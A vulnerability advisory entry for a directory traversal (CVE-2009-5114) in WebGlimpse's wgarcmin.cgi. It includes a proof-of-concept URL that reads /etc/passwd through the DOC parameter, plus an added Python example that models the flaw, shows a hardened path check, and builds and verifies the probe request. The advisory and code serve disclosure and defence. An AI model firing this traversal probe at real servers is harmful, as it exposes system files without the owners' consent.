WebGlimpse 'wgarcmin.cgi' Directory Traversal Vulnerability

Vulnerability ID 1117602 Vulnerability type Path traversal
Published 2009-04-17 Updated 2009-04-27
CVE ID CVE-2009-5114 CNNVD ID CNNVD-201203-338
Platform CGI CVSS score 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/36994
https://www.securityfocus.com/bid/52651
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201203-338
|Vulnerability details
WebGlimpse is a web-based search and indexing package, maintained by the community and administered by the University of Arizona. A directory traversal vulnerability exists in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier. A remote attacker can exploit it to read arbitrary files by supplying .. (dot dot) sequences in the DOC parameter.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/52651/info

WebGlimpse is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

WebGlimpse 2.18.7 is vulnerable; other versions may also be affected. 

http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
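The following is an added example and is not part of the advisory or of WebGlimpse's own code. It models the DOC-parameter traversal above with a minimal unsafe path join (assumed for illustration; the real wgarcmin.cgi source is not on this page), shows the containment check a fixed handler should apply, builds the published probe URL with a configurable number of '../' segments, and checks a response body for passwd-format lines so a scanner can tell a real hit from an error page. The archive root, the example host, and the two sample response bodies are constructed.

```python
"""Added example: traversal model, hardened check and probe helper for the
WebGlimpse wgarcmin.cgi DOC-parameter issue. Not the project's own code."""
import posixpath
import re
import urllib.parse
from typing import Optional

# Constructed: the directory an archive-admin CGI would serve documents from.
# posixpath is used deliberately so the behaviour models a Unix CGI host
# regardless of where this script itself runs.
ARCHIVE_ROOT = "/var/www/webglimpse/archive"

# Constructed response bodies: one that leaked /etc/passwd, one error page.
SAMPLE_HIT = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)
SAMPLE_MISS = "<html><body><h1>Document not found</h1></body></html>"


def unsafe_doc_path(doc: str, root: str = ARCHIVE_ROOT) -> str:
    """Assumed vulnerable pattern: DOC is joined onto the archive root and
    opened as-is, so '..' segments climb out of the root."""
    return posixpath.normpath(posixpath.join(root, doc))


def safe_doc_path(doc: str, root: str = ARCHIVE_ROOT) -> Optional[str]:
    """Hardened version: reject NUL bytes and absolute paths, normalise,
    then require the result to remain inside the archive root.
    Returns None when the request must be refused.
    On a live filesystem also resolve symlinks (os.path.realpath) before
    the prefix test; normpath alone cannot see a link that points outside."""
    if "\0" in doc or doc.startswith(("/", "\\")):
        return None
    candidate = posixpath.normpath(posixpath.join(root, doc))
    # The separator must be part of the prefix test, otherwise a sibling
    # directory such as /var/www/webglimpse/archive2 would be accepted.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def build_probe_url(base: str, target: str = "/etc/passwd", depth: int = 4) -> str:
    """Build the advisory's PoC request; the published PoC uses four '../'.
    Raising depth is the usual way to cope with a deeper archive root."""
    traversal = "../" * depth + target.lstrip("/")
    query = urllib.parse.urlencode(
        {"NEXTPAGE": "D", "ID": "1", "DOC": traversal}, safe="/"
    )
    return f"{base.rstrip('/')}/wgarcmin.cgi?{query}"


# One passwd(5) record: name, password field, uid, gid, gecos, home, shell.
PASSWD_LINE = re.compile(
    r"^[A-Za-z_][A-Za-z0-9_-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M
)


def looks_like_passwd(body: str) -> bool:
    """True when the body contains passwd-format lines, i.e. the probe read
    the real file instead of returning an error or an empty page."""
    return bool(PASSWD_LINE.search(body))


if __name__ == "__main__":
    doc = "../../../../etc/passwd"
    print("probe URL :", build_probe_url("http://www.example.com"))
    print("unsafe    :", unsafe_doc_path(doc))
    print("hardened  :", safe_doc_path(doc))
    print("hit?      :", looks_like_passwd(SAMPLE_HIT), looks_like_passwd(SAMPLE_MISS))
```

When running the probe for real, fetch the URL with whatever HTTP client you use and pass the body to looks_like_passwd; a 200 with an HTML error page is the common false positive this check is meant to filter out.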
|Affected products
WebGlimpse WebGlimpse 2.18.7
|References

Source: websecurity.com.ua
Link: http://websecurity.com.ua/2628/